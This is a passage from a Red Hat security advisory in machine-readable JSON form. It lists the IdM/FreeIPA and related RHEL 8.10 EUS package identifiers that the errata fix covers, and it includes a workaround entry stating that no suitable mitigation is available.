"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-common-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0.12-3.module+el8.9.0+19634+c162f948.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0.12-3.module+el8.9.0+19634+c162f948.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0.12-3.module+el8.9.0+19692+fac39a03.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-core-0.12-3.module+el8.9.0+19634+c162f948.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-core-0.12-3.module+el8.9.0+19692+fac39a03.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-python-compat-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-python-compat-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-selinux-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-selinux-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-dns-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-jwcrypto-0.5.0-2.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-jwcrypto-0.5.0-2.module+el8.10.0+21692+c9b201bc.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python-kdcproxy-0.4-5.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-qrcode-5.1-12.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-qrcode-5.1-12.module+el8.9.0+18920+2223d05e.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python-yubico-1.3.2-9.1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-yubico-1.3.2-9.1.module+el8.9.0+18920+2223d05e.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-custodia-0.6.0-3.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaclient-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaclient-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipalib-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipalib-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaserver-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipatests-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-jwcrypto-0.5.0-2.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-jwcrypto-0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-kdcproxy-0.4-5.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pyusb-1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pyusb-1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-5.1-12.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-5.1-12.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-core-5.1-12.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-core-5.1-12.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-yubico-1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-yubico-1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:pyusb-1.0.0-9.1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:pyusb-1.0.0-9.1.module+el8.9.0+18920+2223d05e.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:3267"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options don\u0027t meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:custodia-0.6.0-3.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:custodia-0.6.0-3.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-4.9.13-9.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-4.9.13-9.module+el8.10.0+21692+c9b201bc.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-common-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-common-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0.12-3.module+el8.9.0+19634+c162f948.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0.12-3.module+el8.9.0+19634+c162f948.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0.12-3.module+el8.9.0+19692+fac39a03.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-core-0.12-3.module+el8.9.0+19634+c162f948.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-core-0.12-3.module+el8.9.0+19692+fac39a03.noarch.rpm-idm:client",
